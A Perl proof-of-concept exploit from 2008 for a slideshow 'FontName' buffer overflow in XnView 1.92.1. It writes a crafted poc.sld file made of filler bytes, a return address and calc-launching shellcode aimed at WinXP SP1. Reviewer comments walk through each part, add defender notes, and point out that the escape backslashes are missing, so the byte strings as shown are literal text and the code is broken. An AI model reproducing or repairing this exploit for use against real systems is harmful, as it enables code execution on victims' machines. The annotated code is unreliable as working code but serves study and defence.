# Title : XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit
# Published : 2008-04-02
# Author : haluznik
#!/usr/bin/perl
# ================================================================
# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
# ================================================================
#
# Calc execution POC Exploit for WinXP SP1 pro English
#
# Found by : Stefan Cornelius, Secunia Research
# Advisory : http://secunia.com/secunia_research/2008-6/advisory
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 04.01.2008 ..April Fools Day ;)
# ================================================================
# Proof-of-concept generator: concatenates four string fragments and writes
# them to poc.sld in the current directory. Per the header comments, the
# file targets the Slideshow "FontName" overflow in XnView 1.92.1.
#
# NOTE(review): every string below reads "x23x20..." or ends in a bare "n"
# with no backslash. The escape characters were presumably lost when this
# page was extracted; as rendered here the values are literal text, not the
# bytes the author intended. Read the comments below with that in mind.
#
# Defender notes:
#  - The observable artefact is an .sld file whose FontName value is much
#    longer than a real font name and contains non-printable bytes. A
#    legitimate value is short printable text.
#  - Consult the Secunia advisory cited in the header for the fixed version,
#    and treat .sld files from untrusted sources as hostile on affected
#    installs.
print "n [*] XnView 1.92.1 Slideshow exploit by haluzniknn";
# Read as hex pairs, this fragment spells the ASCII text
# "# Slide Show Sequence", CR LF, then 'FontName = "' -- i.e. the start of
# a slideshow file up to the opening quote of the FontName value.
my $head=
"x23x20x53x6cx69x64x65x20x53x68".
"x6fx77x20x53x65x71x75x65x6ex63".
"x65x0dx0ax46x6fx6ex74x4ex61x6d".
"x65x20x3dx20x22";
# The FontName value itself: 32 filler characters followed by four more
# bytes. Presumably the filler runs to the end of the fixed-size buffer and
# the four bytes land on a saved control value; the target's stack layout
# is not shown on this page, so treat that as an assumption.
# $fontname is not declared with `my`, so it is a package global (the
# script has no `use strict`).
$fontname = "A" x 32 . "xccx59xfbx77";
# Payload appended directly after the FontName value. The header describes
# it as a calc-launching proof of concept for WinXP SP1 Pro English.
# NOTE(review): it appears to call fixed absolute addresses, which would
# tie it to that one OS build -- confirm against the advisory.
my $shellcode=
"x33xc0x50x68x63x61x6cx63x54x5b".
"x50x53xb9x44x80xc2x77xffxd1x50".
"xbbxfdx98xe7x77xffxd3";
# Read as hex pairs: closing quote, CR LF, '"C:\test.jpg"', CR LF. This
# closes the FontName line and adds a single quoted image path entry.
my $tail=
"x22x0dx0ax22x43x3ax5cx74x65x73".
"x74x2ex6ax70x67x22x0dx0a";
# Final file content, in on-disk order. $sld is also an undeclared global.
$sld = $head . $fontname . $shellcode . $tail;
print " [+] Creating poc.sld file..n";
# Two-argument open with a bareword handle. The filename is a constant
# literal, so there is no mode injection here, but the three-argument form
# with a lexical handle is the safer habit. Only the open is checked; the
# results of print and close are ignored.
open(file,">poc.sld") || die " [-] cannot write filen";
print(file $sld);
close(file);
print " [*] Done!n";